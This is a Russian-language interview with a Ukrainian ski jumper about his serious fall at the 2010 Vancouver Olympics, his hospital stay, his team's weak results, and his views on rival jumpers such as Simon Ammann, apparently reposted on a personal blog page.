- Как звучит официальный диагноз?
-Вывих ключицы третьей степени из шести и ушиб правого легкого. Мне ставили трубку, чтобы вода выходила.

- А как кормят в канадских больницах?

- Мне повезло, что хорошие люди попались. Получал дополнительное питание. Потому что половину из того, что приносили, я вообще есть не мог, а остальное ел, но с большим трудом. Я люблю поесть не много, но вкусно. А там приносили много, попробуешь - не соленое и не сладкое. Первые двое суток вообще не кормили, потому что собирались делать операцию. Но я впоследствии отказался.

-Фотографии вашего падения облетели весь интернет. А вы сами их смотрели?
- Смотрел, но недолго.

- Страшно?
- Не страшно, чего уж теперь боятся. Но очень неприятно, не скрою.

- Это было самое опасное падение в вашей спортивной карьере?
- Пожалуй, да.

-Что произошло, помните? Погодные условия послужили причиной падения или сами виноваты?
-Ничего не помню и вспоминать не хочу. Тренера видел буквально десять минут, он привез мне сумку с вещами в больницу. Поинтересовался, как мои дела. Что произошло, мы с ним не обсуждали. Да и про падение лучше забыть. Начну сезон с нового разноцветного листа и буду писать его яркими красками.

- Вы остались недовольны своим выступлением на малом трамплине, но на большом получилось еще хуже - никто из украинских спортсменов даже квалификацию не прошел. В чем причина?
- На малом трамплине самочувствие было плохое. Первая тренировка прошла прекрасно, вторая тоже. А соревнования как раз попали на третий после перелета день, самый тяжелый в плане акклиматизации, и как говорится - приехали. Накануне старта квалификации на большом трамплине я упал и поломал свои стартовые лыжи. Прыгал на запасных, а они на порядок хуже. А вообще уровень за последние несколько лет вырос на столько, что мы просто не успеваем за ним. Вроде бы наверстываем, и все равно отстаем. Может, просто спортивной карьеры не хватить.

- На Олимпиаде-2010 прыжки с трамплина - единственный вид спорта, в котором в обеих дисциплинах на пьедестал поднялись одни и те же люди и точно в таком же порядке. О чем это говорит, на ваш взгляд?
- Об их очень высоком профессиональном уровне.

- Симон Аманн стал уже четырехкратным олимпийским чемпионом. Что позволило ему переписать историю прыжков с трамплина?
- Необыкновенная уверенность в себе. Перед стартом это было очень видно. Адам Малыш тоже был уверен в себе, но в меньшей степени, чем Аманн. Грегор Шлиренцауэр наоборот выглядел каким-то заведенным. Конечно, каждый по-своему настраивается на старт. Много раз австрийцу его спортивная наглость помогала, но на этот раз не помогла.

-Вас удивила новость об отставке Вольфганга Штайерта с поста главного тренера сборной России?Невпечатляющие результаты наших северных соседей на Олимпиаде - это объективное отображение развития у них прыжков с трамплина или же немецкий специалист просто не смог найти подход к загадочной русской душе?
- Штайерт подал в отставку? Я не знал. Он очень продуктивно работал первые годы. Посмотрите даже на летние результаты. Денис Корнилов был на высоте. Дима Васильев летом никогда не блистал. Вообще есть летние прыгуны, а есть зимние. А мы универсалы, приходится (смеется).

- Поделитесь первыми впечатлениями от просмотра соревнований по женскому фигурному катанию?
- Я просто в восторге. Первый раз вживую вижу соревнования по фигурному катанию, да еще на Олимпиаде.

- Не пожалели, что не стали фигуристом? Им, по крайней мере, есть больше можно...
- Нет (смеется). Больше удовольствия, чем летать, далеко летать, я еще не испытывал.




Поиск сообщений в Steem777
Страницы: 8 [7] 6 5 4 3 2 1 Календарь